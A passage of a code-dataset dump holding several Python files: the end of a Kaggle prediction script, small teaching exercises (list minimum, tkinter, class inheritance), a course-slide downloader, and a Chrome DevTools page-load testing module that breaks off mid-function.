df.columns]\n ccc.remove('target')\n df.drop(ccc, axis=1, inplace=True)\n\n if inner:\n for i in inner:\n insert_this(i)\n\n print('What we got:')\n print(df.dtypes)\n print('number of rows:', len(df))\n print('number of columns:', len(df.columns))\n\n if on:\n df = df[on]\n\n df.drop('target', axis=1, inplace=True)\n for col in df.columns:\n if df[col].dtype == object:\n df[col] = df[col].astype('category')\n\n print()\n print('on making feature:')\n print(df.dtypes)\n print('number of columns:', len(df.columns))\n print()\n\n X_test = df\n ids = df.index\n del df\n\n print('Making predictions...')\n\n p_test_1 = model.predict(X_test)\n\n if not is_test:\n del model\n\n print('prediction done.')\n print('creating new feature')\n subm = pd.DataFrame()\n subm['id'] = ids\n del ids\n subm['target'] = p_test_1\n del p_test_1\n subm.to_csv(save_dir + 'feature/FAKE_' + model_name + '.csv',\n index=False, float_format='%.5f')\n print('[complete] featuring, name:', 'FAKE_'+model_name + '.csv')\n\nif is_test:\n\n print('in test phase:')\n print('loading test set.')\n load_name = 'test_set'\n dt = pickle.load(open(save_dir + load_name + '_dict.save', \"rb\"))\n df = pd.read_csv(save_dir + load_name + \".csv\", dtype=dt)\n del dt\n\n if barebone:\n ccc = [i for i in df.columns]\n ccc.remove('id')\n df.drop(ccc, axis=1, inplace=True)\n if inner:\n for i in inner:\n insert_this_test(i)\n\n print('What we got:')\n print(df.dtypes)\n print('number of rows:', len(df))\n print('number of columns:', len(df.columns))\n\n if on:\n on.remove('target')\n on.append('id')\n df = df[on]\n\n for col in df.columns:\n if df[col].dtype == object:\n df[col] = df[col].astype('category')\n\n print()\n print('on test:')\n print(df.dtypes)\n print('number of columns:', len(df.columns))\n print()\n\n X_test = df.drop(['id'], axis=1)\n ids = df['id'].values\n del df\n\n print('Making predictions...')\n\n p_test_1 = model.predict(X_test)\n del model\n\n print('prediction done.')\n print('creating submission')\n subm = pd.DataFrame()\n subm['id'] = ids\n del ids\n subm['target'] = p_test_1\n del p_test_1\n subm.to_csv(save_dir+'submission/'+model_name+'.csv',\n index=False, float_format='%.5f')\n print('[complete] submission name:', model_name+'.csv.gz')\n\nprint()\nprint('test program complete.')\n\nprint()\ntime_elapsed = time.time() - since\nprint('[timer]: complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n\n\n","sub_path":"kaggle_song_git/code_box/VALIDATION_fake_feature_insert_V1001/fake_model_testing_V1001.py","file_name":"fake_model_testing_V1001.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"148768836","text":"from random import *\r\n\r\nliste = []\r\nfor i in range(20):\r\n x = randint(0, 20)\r\n liste.append(x)\r\nprint(liste)\r\n\r\nminimum = liste[0]\r\nfor element in liste:\r\n if element < minimum:\r\n minimum = element\r\nprint(minimum)","sub_path":"min.py","file_name":"min.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235187624","text":"import requests\nimport os\nimport re\n\nnowday = 1\nurlrule = \"http://resources.tmooc.cn/tctm/TTS/ttsPage/L1APy/L1APy_V01/Level_5/\"\nendurl = \"/COURSE/ppt.html\"\n\ndef download_img(img_url,name):\n header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 
Safari/537.36',\n 'x-forward-for':'0.0.0.0'\n }\n r = requests.get(img_url, headers=header, stream=True)\n print('img status:' + str(r.status_code))\n if r.status_code == 200:\n open(name, 'wb').write(r.content)\n del r\n\nwhile True:\n pptrule = \"\"\n if nowday < 10:\n pptrule = \"DAY0\"+str(nowday) \n else:\n pptrule = 'DAY' + str(nowday)\n nowday+=1 \n res = requests.get(urlrule+pptrule+endurl)\n print(\"download \"+pptrule+\":\")\n print('html staus:' + str(res.status_code))\n if res.status_code != 200:\n print(\"No such file\")\n continue\n else:\n print(\"File acquired\")\n res.encoding = 'utf-8'\n r = res.text\n dpath = os.getcwd()\n os.mkdir(dpath+'\\\\'+pptrule)\n c = open(pptrule+'/'+pptrule+'.html','w+',encoding='utf-8')\n c.write(r)\n c.close()\n img_url_list = re.findall('',r)\n for img in img_url_list: \n download_img(urlrule+pptrule+'/COURSE/'+img,pptrule+\"/\"+img)\n print(\"done\")","sub_path":"tts/level5/autodownload.py","file_name":"autodownload.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486574353","text":"import tkinter as tk\nfrom tkinter import ttk\n\n\n\nclass MyButton(tk.Button):\n def __init__(self, master=None, *args, **kwargs):\n super(MyButton, self).__init__(master = None, *args, **kwargs)\n\n self.state = \"disabled\"\n self.text = \"1111\"\n self.configure(\"text\")\n\n\n\nclass MyGui(tk.Frame):\n def __init__(self):\n super(MyGui, self).__init__()\n self.addWidgets()\n\n self.pack()\n\n def addWidgets(self):\n btn = MyButton(self)\n btn.pack()\n\n\nif __name__ == \"__main__\":\n gui = MyGui()\n gui.mainloop()\n","sub_path":"temoTest.py","file_name":"temoTest.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"108145531","text":"class Lamborghini :\n def __init__(self, brand, model, year):\n self.brand = brand\n self.model = model\n self.year = year\n\n def start(self):\n print(\"Starting the car\")\n\n def stop(self):\n print(\"Stopping the car\")\n\nclass Gallardo(Lamborghini) :\n def __init__(self, cruisecontrolenabled, brand, model, year):\n Lamborghini.__init__(self, brand, model, year)\n self.cruisecontrolenabled = cruisecontrolenabled\n\n def display(self):\n print(self.cruisecontrolenabled)\n\n def start(self):\n print(\"Press the button\")\n\nclass Aventador(Lamborghini):\n def __init__(self, parkingassistenabled, brand, model, year):\n Lamborghini.__init__(self, brand, model, year)\n self.parkingassistenabled = parkingassistenabled\n\n def display(self):\n print(self.parkingassistenabled)\n\nG = Gallardo(True, \"Lamborghini\", \"Gallardo\", 2016)\nprint(G.cruisecontrolenabled)\nprint(G.brand)\nprint(G.model)\nprint(G.year)\n\nG.start()\nG.stop()\nG.display()\nG.start()\n\nA = Aventador(True, \"Lamborghini\", \"Aventador\", 2018)\nprint(A.parkingassistenabled)\nprint(A.brand)\nprint(A.model)\nprint(A.year)\n\nA.start()\nA.stop()\nA.display()\n\n'''By Ankush Chavan'''","sub_path":"Inheritance/Overriding.py","file_name":"Overriding.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"274055487","text":"# Copyright 2017 Google Inc. 
All rights reserved.\n# Use of this source code is governed by the Apache 2.0 license that can be\n# found in the LICENSE file.\n\"\"\"Main entry point for interfacing with Chrome's remote debugging protocol\"\"\"\nimport base64\nimport gzip\nimport logging\nimport os\nimport Queue\nimport re\nimport subprocess\nimport time\nimport monotonic\nimport ujson as json\nfrom ws4py.client.threadedclient import WebSocketClient\n\nclass DevTools(object):\n \"\"\"Interface into Chrome's remote dev tools protocol\"\"\"\n def __init__(self, options, job, task, use_devtools_video):\n self.url = \"http://localhost:{0:d}/json\".format(task['port'])\n self.websocket = None\n self.options = options\n self.job = job\n self.task = task\n self.command_id = 0\n self.page_loaded = None\n self.main_frame = None\n self.is_navigating = False\n self.last_activity = monotonic.monotonic()\n self.dev_tools_file = None\n self.trace_file = None\n self.trace_enabled = False\n self.requests = {}\n self.nav_error = None\n self.main_request = None\n self.path_base = None\n self.support_path = None\n self.video_path = None\n self.video_prefix = None\n self.recording = False\n self.mobile_viewport = None\n self.tab_id = None\n self.use_devtools_video = use_devtools_video\n self.recording_video = False\n self.prepare()\n\n def prepare(self):\n \"\"\"Set up the various paths and states\"\"\"\n self.requests = {}\n self.nav_error = None\n self.main_request = None\n self.path_base = os.path.join(self.task['dir'], self.task['prefix'])\n self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"support\")\n self.video_path = os.path.join(self.task['dir'], self.task['video_subdirectory'])\n self.video_prefix = os.path.join(self.video_path, 'ms_')\n if not os.path.isdir(self.video_path):\n os.makedirs(self.video_path)\n\n def start_navigating(self):\n \"\"\"Indicate that we are about to start a known-navigation\"\"\"\n self.main_frame = None\n self.is_navigating = True\n\n def wait_for_available(self, timeout):\n \"\"\"Wait for the dev tools interface to become available (but don't connect)\"\"\"\n import requests\n ret = False\n end_time = monotonic.monotonic() + timeout\n while not ret and monotonic.monotonic() < end_time:\n try:\n response = requests.get(self.url, timeout=timeout)\n if len(response.text):\n tabs = response.json()\n logging.debug(\"Dev Tools tabs: %s\", json.dumps(tabs))\n if len(tabs):\n for index in xrange(len(tabs)):\n if 'type' in tabs[index] and \\\n tabs[index]['type'] == 'page' and \\\n 'webSocketDebuggerUrl' in tabs[index] and \\\n 'id' in tabs[index]:\n ret = True\n except Exception as err:\n logging.critical(\"Connect to dev tools Error: %s\", err.__str__())\n time.sleep(0.5)\n return ret\n\n def connect(self, timeout):\n \"\"\"Connect to the browser\"\"\"\n import requests\n ret = False\n end_time = monotonic.monotonic() + timeout\n while not ret and monotonic.monotonic() < end_time:\n try:\n response = requests.get(self.url, timeout=timeout)\n if len(response.text):\n tabs = response.json()\n logging.debug(\"Dev Tools tabs: %s\", json.dumps(tabs))\n if len(tabs):\n websocket_url = None\n for index in xrange(len(tabs)):\n if 'type' in tabs[index] and \\\n tabs[index]['type'] == 'page' and \\\n 'webSocketDebuggerUrl' in tabs[index] and \\\n 'id' in tabs[index]:\n if websocket_url is None:\n websocket_url = tabs[index]['webSocketDebuggerUrl']\n self.tab_id = tabs[index]['id']\n else:\n # Close extra tabs\n requests.get(self.url + '/close/' + tabs[index]['id'])\n if websocket_url is not 
None:\n try:\n self.websocket = DevToolsClient(websocket_url)\n self.websocket.connect()\n ret = True\n except Exception as err:\n logging.critical(\"Connect to dev tools websocket Error: %s\",\n err.__str__())\n if not ret:\n # try connecting to 127.0.0.1 instead of localhost\n try:\n websocket_url = websocket_url.replace('localhost', '127.0.0.1')\n self.websocket = DevToolsClient(websocket_url)\n self.websocket.connect()\n ret = True\n except Exception as err:\n logging.critical(\"Connect to dev tools websocket Error: %s\",\n err.__str__())\n else:\n time.sleep(0.5)\n else:\n time.sleep(0.5)\n except Exception as err:\n logging.critical(\"Connect to dev tools Error: %s\", err.__str__())\n time.sleep(0.5)\n return ret\n\n def close(self, close_tab=True):\n \"\"\"Close the dev tools connection\"\"\"\n if self.websocket:\n try:\n self.websocket.close()\n except Exception:\n pass\n self.websocket = None\n if close_tab and self.tab_id is not None:\n import requests\n requests.get(self.url + '/close/' + self.tab_id)\n self.tab_id = None\n\n def start_recording(self):\n \"\"\"Start capturing dev tools, timeline and trace data\"\"\"\n self.prepare()\n self.recording = True\n if self.use_devtools_video and self.job['video'] and self.task['log_data']:\n self.grab_screenshot(self.video_prefix + '000000.png')\n elif self.mobile_viewport is None and not self.options.android and \\\n 'mobile' in self.job and self.job['mobile']:\n # grab an initial screen shot to get the crop rectangle\n try:\n tmp_file = os.path.join(self.task['dir'], 'tmp.png')\n self.grab_screenshot(tmp_file)\n os.remove(tmp_file)\n except Exception:\n pass\n self.flush_pending_messages()\n self.send_command('Page.enable', {})\n self.send_command('Inspector.enable', {})\n self.send_command('Network.enable', {})\n if 'user_agent_string' in self.job:\n self.send_command('Network.setUserAgentOverride',\n {'userAgent': self.job['user_agent_string']}, wait=True)\n if 'headers' in self.job:\n self.send_command('Network.setExtraHTTPHeaders',\n {'headers': self.job['headers']}, wait=True)\n if len(self.task['block']):\n for block in self.task['block']:\n self.send_command('Network.addBlockedURL', {'url': block})\n if self.task['log_data']:\n self.send_command('Security.enable', {})\n self.send_command('Console.enable', {})\n if 'trace' in self.job and self.job['trace']:\n if 'traceCategories' in self.job:\n trace = self.job['traceCategories']\n else:\n trace = \"-*,blink,v8,cc,gpu,blink.net,disabled-by-default-v8.runtime_stats\"\n else:\n trace = \"-*\"\n if 'timeline' in self.job and self.job['timeline']:\n trace += \",blink.console,disabled-by-default-devtools.timeline,devtools.timeline\"\n trace += \",disabled-by-default-blink.feature_usage\"\n trace += \",toplevel,disabled-by-default-devtools.timeline.frame\"\n trace += \"devtools.timeline.frame\"\n if self.use_devtools_video and self.job['video']:\n trace += \",disabled-by-default-devtools.screenshot\"\n self.recording_video = True\n trace += \",blink.user_timing,netlog\"\n self.trace_enabled = True\n self.send_command('Tracing.start',\n {'categories': trace, 'options': 'record-as-much-as-possible'})\n now = monotonic.monotonic()\n if not self.task['stop_at_onload']:\n self.last_activity = now\n if self.page_loaded is not None:\n self.page_loaded = now\n\n def stop_recording(self):\n \"\"\"Stop capturing dev tools, timeline and trace data\"\"\"\n self.recording = False\n self.send_command('Inspector.disable', {})\n self.send_command('Page.disable', {})\n self.collect_trace()\n if 
self.task['log_data']:\n            self.send_command('Security.disable', {})\n            self.send_command('Console.disable', {})\n            self.get_response_bodies()\n        self.send_command('Network.disable', {})\n        if self.dev_tools_file is not None:\n            self.dev_tools_file.write(\"\\n]\")\n            self.dev_tools_file.close()\n            self.dev_tools_file = None\n\n    def collect_trace(self):\n        \"\"\"Stop tracing and collect the results\"\"\"\n        if self.trace_enabled:\n            self.trace_enabled = False\n            video_prefix = self.video_prefix if self.recording_video else None\n            self.websocket.start_processing_trace(self.path_base + '_trace.json', video_prefix)\n            self.send_command('Tracing.end', {})\n            start = monotonic.monotonic()\n            # Keep pumping messages until we get tracingComplete or\n            # we get a gap of 30 seconds between messages\n            if self.websocket:\n                logging.info('Collecting trace events')\n                done = False\n                no_message_count = 0\n                while not done and no_message_count < 30:\n                    try:\n                        raw = self.websocket.get_message(1)\n                        if raw is not None and len(raw):\n                            no_message_count = 0\n                            msg = json.loads(raw)\n                            if 'method' in msg and msg['method'] == 'Tracing.tracingComplete':\n                                done = True\n                        else:\n                            no_message_count += 1\n                    except Exception:\n                        pass\n            self.websocket.stop_processing_trace()\n            elapsed = monotonic.monotonic() - start\n            logging.debug(\"Time to collect trace: %0.3f sec\", elapsed)\n        self.recording_video = False\n\n    def get_response_bodies(self):\n        \"\"\"Retrieve all of the response bodies for the requests that we know about\"\"\"\n        import zipfile\n        requests = self.get_requests()\n        if requests:\n            optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])\n            # see if we also need to zip them up\n            zip_file = None\n            if 'bodies' in self.job and self.job['bodies']:\n                zip_file = zipfile.ZipFile(self.path_base + '_bodies.zip', 'w',\n                                           zipfile.ZIP_DEFLATED)\n            path = os.path.join(self.task['dir'], 'bodies')\n            if not os.path.isdir(path):\n                os.makedirs(path)\n            index = 0\n            for request_id in requests:\n                request = requests[request_id]\n                if 'status' in request and \\\n                        request['status'] == 200 and \\\n                        'response_headers' in request:\n                    content_length = self.get_header_value(request['response_headers'],\n                                                           'Content-Length')\n                    if content_length is not None:\n                        content_length = int(re.search(r'\\d+', str(content_length)).group())\n                    elif 'transfer_size' in request:\n                        content_length = request['transfer_size']\n                    if content_length > 0:\n                        body_file_path = os.path.join(path, request_id)\n                        if not os.path.exists(body_file_path):\n                            # Only grab bodies needed for optimization checks\n                            # or if we are saving full bodies\n                            need_body = False\n                            content_type = self.get_header_value(request['response_headers'],\n                                                                 'Content-Type')\n                            content_encoding = self.get_header_value(request['response_headers'],\n                                                                     'Content-Encoding')\n                            is_image = False\n                            is_text = False\n                            is_video = False\n                            if content_type is not None:\n                                content_type = content_type.lower()\n                                if content_type[:5] == 'text/' or \\\n                                        content_type.find('javascript') >= 0 or \\\n                                        content_type.find('json') >= 0:\n                                    is_text = True\n                                if content_type[:6] == 'image/':\n                                    is_image = True\n                                if content_type[:6] == 'video/':\n                                    is_video = True\n                            is_compressed = False\n                            if content_encoding is not None:\n                                content_encoding = content_encoding.lower()\n                                if content_encoding.find('gzip') >= 0 or \\\n                                        content_encoding.find('deflate') >= 0 or \\\n                                        content_encoding.find('br') >= 0:\n                                    is_compressed = True\n                            if not optimization_checks_disabled:\n                                if is_image and content_length >= 1400:\n                                    need_body = True\n                                if not is_compressed and not is_video and 
content_length >= 1400:\n need_body = True\n if zip_file is not None and is_text:\n need_body = True\n if need_body:\n response = self.send_command(\"Network.getResponseBody\",\n {'requestId': request_id}, wait=True)\n if response is None or 'result' not in response or \\\n 'body' not in response['result']:\n logging.warning('Missing response body for request %s',\n request_id)\n elif len(response['result']['body']):\n # Write the raw body to a file (all bodies)\n if 'base64Encoded' in response['result'] and \\\n response['result']['base64Encoded']:\n with open(body_file_path, 'wb') as body_file:\n body_file.write(\n base64.b64decode(response['result']['body']))\n else:\n body = response['result']['body'].encode('utf-8')\n with open(body_file_path, 'wb') as body_file:\n body_file.write(body)\n # Add text bodies to the zip archive\n if zip_file is not None:\n index += 1\n name = '{0:03d}-{1}-body.txt'.format(index, request_id)\n zip_file.writestr(name, body)\n if zip_file is not None:\n zip_file.close()\n\n def get_requests(self):\n \"\"\"Get a dictionary of all of the requests and the details (headers, body file)\"\"\"\n requests = None\n if self.requests:\n body_path = os.path.join(self.task['dir'], 'bodies')\n for request_id in self.requests:\n if 'fromNet' in self.requests[request_id] and self.requests[request_id]['fromNet']:\n events = self.requests[request_id]\n request = {'id': request_id}\n # See if we have a body\n body_file_path = os.path.join(body_path, request_id)\n if os.path.isfile(body_file_path):\n request['body'] = body_file_path\n # Get the headers from responseReceived\n if 'response' in events:\n response = events['response'][-1]\n if 'response' in response:\n if 'url' in response['response']:\n request['url'] = response['response']['url']\n if 'status' in response['response']:\n request['status'] = response['response']['status']\n if 'headers' in response['response']:\n request['response_headers'] = response['response']['headers']\n if 'requestHeaders' in response['response']:\n request['request_headers'] = response['response']['requestHeaders']\n if 'connectionId' in response['response']:\n request['connection'] = response['response']['connectionId']\n # Fill in any missing details from the requestWillBeSent event\n if 'request' in events:\n req = events['request'][-1]\n if 'request' in req:\n if 'url' not in request and 'url' in req['request']:\n request['url'] = req['request']['url']\n if 'request_headers' not in request and 'headers' in req['request']:\n request['request_headers'] = req['request']['headers']\n # Get the response length from the data events\n if 'finished' in events and 'encodedDataLength' in events['finished']:\n request['transfer_size'] = events['finished']['encodedDataLength']\n elif 'data' in events:\n transfer_size = 0\n for data in events['data']:\n if 'encodedDataLength' in data:\n transfer_size += data['encodedDataLength']\n elif 'dataLength' in data:\n transfer_size += data['dataLength']\n request['transfer_size'] = transfer_size\n\n if requests is None:\n requests = {}\n requests[request_id] = request\n return requests\n\n def flush_pending_messages(self):\n \"\"\"Clear out any pending websocket messages\"\"\"\n if self.websocket:\n try:\n while True:\n raw = self.websocket.get_message(0)\n if raw is not None and len(raw):\n logging.debug(raw[:200])\n msg = json.loads(raw)\n self.process_message(msg)\n if not raw:\n break\n except Exception:\n pass\n\n def send_command(self, method, params, wait=False, timeout=30):\n \"\"\"Send a raw dev 
tools message and optionally wait for the response\"\"\"\n ret = None\n if self.websocket:\n self.command_id += 1\n msg = {'id': self.command_id, 'method': method, 'params': params}\n try:\n out = json.dumps(msg)\n logging.debug(\"Sending: %s\", out)\n self.websocket.send(out)\n if wait:\n end_time = monotonic.monotonic() + timeout\n while ret is None and monotonic.monotonic() < end_time:\n try:\n raw = self.websocket.get_message(1)\n if raw is not None and len(raw):\n logging.debug(raw[:200])\n msg = json.loads(raw)\n self.process_message(msg)\n if 'id' in msg and \\\n int(re.search(r'\\d+', str(msg['id'])).group()) == \\\n self.command_id:\n ret = msg\n except Exception:\n pass\n except Exception as err:\n logging.critical(\"Websocket send error: %s\", err.__str__())\n return ret\n\n def wait_for_page_load(self):\n \"\"\"Wait for the page load and activity to finish\"\"\"\n if self.websocket:\n start_time = monotonic.monotonic()\n end_time = start_time + self.task['time_limit']\n done = False\n while not done:\n try:\n raw = self.websocket.get_message(1)\n if raw is not None and len(raw):\n logging.debug(raw[:200])\n msg = json.loads(raw)\n self.process_message(msg)\n except Exception:\n # ignore timeouts when we're in a polling read loop\n pass\n now = monotonic.monotonic()\n elapsed_test = now - start_time\n if now >= end_time:\n done = True\n # only consider it an error if we didn't get a page load event\n if self.page_loaded is None:\n self.task['error'] = \"Page Load Timeout\"\n elif 'time' not in self.job or elapsed_test > self.job['time']:\n elapsed_activity = now - self.last_activity\n elapsed_page_load = now - self.page_loaded if self.page_loaded else 0\n if elapsed_page_load >= 1 and elapsed_activity >= self.task['activity_time']:\n done = True\n elif self.task['error'] is not None:\n done = True\n\n def grab_screenshot(self, path, png=True, resize=0):\n \"\"\"Save the screen shot (png or jpeg)\"\"\"\n response = self.send_command(\"Page.captureScreenshot\", {}, wait=True, timeout=5)\n if response is not None and 'result' in response and 'data' in response['result']:\n resize_string = '' if not resize else '-resize {0:d}x{0:d} '.format(resize)\n if png:\n with open(path, 'wb') as image_file:\n image_file.write(base64.b64decode(response['result']['data']))\n # Fix png issues\n cmd = 'mogrify -format png -define png:color-type=2 '\\\n '-depth 8 {0}\"{1}\"'.format(resize_string, path)\n logging.debug(cmd)\n subprocess.call(cmd, shell=True)\n self.crop_screen_shot(path)\n else:\n tmp_file = path + '.png'\n with open(tmp_file, 'wb') as image_file:\n image_file.write(base64.b64decode(response['result']['data']))\n self.crop_screen_shot(tmp_file)\n command = 'convert \"{0}\" {1}-quality {2:d} \"{3}\"'.format(\n tmp_file, resize_string, self.job['iq'], path)\n logging.debug(command)\n subprocess.call(command, shell=True)\n if os.path.isfile(tmp_file):\n try:\n os.remove(tmp_file)\n except Exception:\n pass\n\n def colors_are_similar(self, color1, color2, threshold=15):\n \"\"\"See if 2 given pixels are of similar color\"\"\"\n similar = True\n delta_sum = 0\n for value in xrange(3):\n delta = abs(color1[value] - color2[value])\n delta_sum += delta\n if delta > threshold:\n similar = False\n if delta_sum > threshold:\n similar = False\n return similar\n\n def crop_screen_shot(self, path):\n \"\"\"Crop to the viewport (for mobile tests)\"\"\"\n if not self.options.android and 'mobile' in self.job and self.job['mobile']:\n try:\n # detect the viewport if we haven't already\n if 
self.mobile_viewport is None:\n from PIL import Image\n image = Image.open(path)\n width, height = image.size\n pixels = image.load()\n background = pixels[10, 10]\n viewport_width = None\n viewport_height = None\n x_pos = 10\n y_pos = 10\n while viewport_width is None and x_pos < width:\n pixel_color = pixels[x_pos, y_pos]\n if not self.colors_are_similar(background, pixel_color):\n viewport_width = x_pos\n else:\n x_pos += 1\n if viewport_width is None:\n viewport_width = width\n x_pos = 10\n while viewport_height is None and y_pos < height:\n pixel_color = pixels[x_pos, y_pos]\n if not self.colors_are_similar(background, pixel_color):\n viewport_height = y_pos\n else:\n y_pos += 1\n if viewport_height is None:\n viewport_height = height\n self.mobile_viewport = '{0:d}x{1:d}+0+0'.format(viewport_width, viewport_height)\n logging.debug('Mobile viewport found: %s in %dx%d screen shot',\n self.mobile_viewport, width, height)\n if self.mobile_viewport is not None:\n command = 'mogrify -crop {0} \"{1}\"'.format(self.mobile_viewport, path)\n logging.debug(command)\n subprocess.call(command, shell=True)\n except Exception:\n pass\n\n def execute_js(self, script):\n \"\"\"Run the provided JS in the browser and return the result\"\"\"\n ret = None\n response = self.send_command(\"Runtime.evaluate\",\n {'expression': script, 'returnByValue': True},\n wait=True)\n if response is not None and 'result' in response and\\\n 'result' in response['result'] and\\\n 'value' in response['result']['result']:\n ret = response['result']['result']['value']\n return ret\n\n def process_message(self, msg):\n \"\"\"Process an inbound dev tools message\"\"\"\n if 'method' in msg and self.recording:\n parts = msg['method'].split('.')\n if len(parts) >= 2:\n category = parts[0]\n event = parts[1]\n if category == 'Page':\n self.process_page_event(event, msg)\n self.log_dev_tools_event(msg)\n elif category == 'Network':\n self.process_network_event(event, msg)\n self.log_dev_tools_event(msg)\n elif category == 'Inspector':\n self.process_inspector_event(event)\n else:\n self.log_dev_tools_event(msg)\n\n def process_page_event(self, event, msg):\n \"\"\"Process Page.* dev tools events\"\"\"\n if event == 'loadEventFired':\n self.page_loaded = monotonic.monotonic()\n elif event == 'frameStartedLoading' and 'params' in msg and 'frameId' in msg['params']:\n if self.is_navigating and self.main_frame is None:\n self.is_navigating = False\n self.main_frame = msg['params']['frameId']\n if self.main_frame == msg['params']['frameId']:\n logging.debug(\"Navigating main frame\")\n self.last_activity = monotonic.monotonic()\n self.page_loaded = None\n elif event == 'frameStoppedLoading' and 'params' in msg and 'frameId' in msg['params']:\n if self.main_frame is not None and \\\n not self.page_loaded and \\\n self.main_frame == msg['params']['frameId']:\n if self.nav_error is not None:\n self.task['error'] = self.nav_error\n logging.debug(\"Page load failed: %s\", self.nav_error)\n self.page_loaded = monotonic.monotonic()\n elif event == 'javascriptDialogOpening':\n self.task['error'] = \"Page opened a modal dailog\"\n\n def process_network_event(self, event, msg):\n \"\"\"Process Network.* dev tools events\"\"\"\n if not self.task['stop_at_onload']:\n self.last_activity = monotonic.monotonic()\n if 'requestId' in msg['params']:\n request_id = msg['params']['requestId']\n if request_id not in self.requests:\n request = {'id': request_id}\n self.requests[request_id] = request\n if event == 'requestWillBeSent':\n if 'request' not in 
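crop_screen_shot() locates the viewport by walking right and then down from (10, 10) until a pixel stops matching the background color. A rough standalone version under the same assumptions (Pillow installed; find_viewport is a hypothetical name):

from PIL import Image

def colors_are_similar(c1, c2, threshold=15):
    # Similar when no channel delta nor the summed delta exceeds the threshold
    deltas = [abs(a - b) for a, b in zip(c1[:3], c2[:3])]
    return max(deltas) <= threshold and sum(deltas) <= threshold

def find_viewport(path):
    image = Image.open(path)
    width, height = image.size
    pixels = image.load()
    background = pixels[10, 10]
    x = y = 10
    while x < width and colors_are_similar(background, pixels[x, 10]):
        x += 1
    while y < height and colors_are_similar(background, pixels[10, y]):
        y += 1
    # Fall back to the full image when no edge was found, as above
    return (x if x < width else width), (y if y < height else height)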
self.requests[request_id]:\n self.requests[request_id]['request'] = []\n self.requests[request_id]['request'].append(msg['params'])\n self.requests[request_id]['fromNet'] = True\n if self.main_frame is not None and \\\n self.main_request is None and \\\n 'frameId' in msg['params'] and \\\n msg['params']['frameId'] == self.main_frame:\n logging.debug('Main request detected')\n self.main_request = request_id\n elif event == 'resourceChangedPriority':\n if 'priority' not in self.requests[request_id]:\n self.requests[request_id]['priority'] = []\n self.requests[request_id]['priority'].append(msg['params'])\n elif event == 'requestServedFromCache':\n self.requests[request_id]['fromNet'] = False\n elif event == 'responseReceived':\n if 'response' not in self.requests[request_id]:\n self.requests[request_id]['response'] = []\n self.requests[request_id]['response'].append(msg['params'])\n if 'response' in msg['params'] and \\\n 'fromDiskCache' in msg['params']['response'] and \\\n msg['params']['response']['fromDiskCache']:\n self.requests[request_id]['fromNet'] = False\n elif event == 'dataReceived':\n if 'data' not in self.requests[request_id]:\n self.requests[request_id]['data'] = []\n self.requests[request_id]['data'].append(msg['params'])\n elif event == 'loadingFinished':\n self.requests[request_id]['finished'] = msg['params']\n elif event == 'loadingFailed':\n self.requests[request_id]['failed'] = msg['params']\n if self.main_request is not None and \\\n request_id == self.main_request and \\\n 'errorText' in msg['params'] and \\\n 'canceled' in msg['params'] and \\\n not msg['params']['canceled']:\n self.nav_error = msg['params']['errorText']\n logging.debug('Navigation error: %s', self.nav_error)\n\n def process_inspector_event(self, event):\n \"\"\"Process Inspector.* dev tools events\"\"\"\n if event == 'detached':\n self.task['error'] = 'Inspector detached, possibly crashed.'\n elif event == 'targetCrashed':\n self.task['error'] = 'Browser crashed.'\n\n def log_dev_tools_event(self, msg):\n \"\"\"Log the dev tools events to a file\"\"\"\n if self.task['log_data']:\n if self.dev_tools_file is None:\n path = self.path_base + '_devtools.json.gz'\n self.dev_tools_file = gzip.open(path, 'wb', 7)\n self.dev_tools_file.write(\"[{}\")\n if self.dev_tools_file is not None:\n self.dev_tools_file.write(\",\\n\")\n self.dev_tools_file.write(json.dumps(msg))\n\n def get_header_value(self, headers, name):\n \"\"\"Get the value for the requested header\"\"\"\n value = None\n if headers:\n if name in headers:\n value = headers[name]\n else:\n find = name.lower()\n for header_name in headers:\n check = header_name.lower()\n if check == find or (check[0] == ':' and check[1:] == find):\n value = headers[header_name]\n break\n return value\n\n def bytes_from_range(self, text, range_info):\n \"\"\"Convert a line/column start and end into a byte count\"\"\"\n byte_count = 0\n try:\n lines = text.splitlines()\n line_count = len(lines)\n start_line = range_info['startLine']\n end_line = range_info['endLine']\n if start_line > line_count or end_line > line_count:\n return 0\n start_column = range_info['startColumn']\n end_column = range_info['endColumn']\n if start_line == end_line:\n byte_count = end_column - start_column + 1\n else:\n # count the whole lines between the partial start and end lines\n if end_line > start_line + 1:\n for row in xrange(start_line + 1, end_line):\n byte_count += len(lines[row])\n byte_count += len(lines[start_line][start_column:])\n byte_count += end_column\n except Exception:\n 
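A worked example for bytes_from_range() with made-up text and range: the count is the tail of the start line, every whole middle line, and end_column bytes of the end line.

text = "alpha\nbravo\ncharlie"
lines = text.splitlines()
range_info = {'startLine': 0, 'startColumn': 2, 'endLine': 2, 'endColumn': 4}
# tail of "alpha" from column 2 ("pha", 3 bytes) + all of "bravo" (5) + 4
byte_count = len(lines[0][range_info['startColumn']:]) + len(lines[1]) + range_info['endColumn']
assert byte_count == 12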
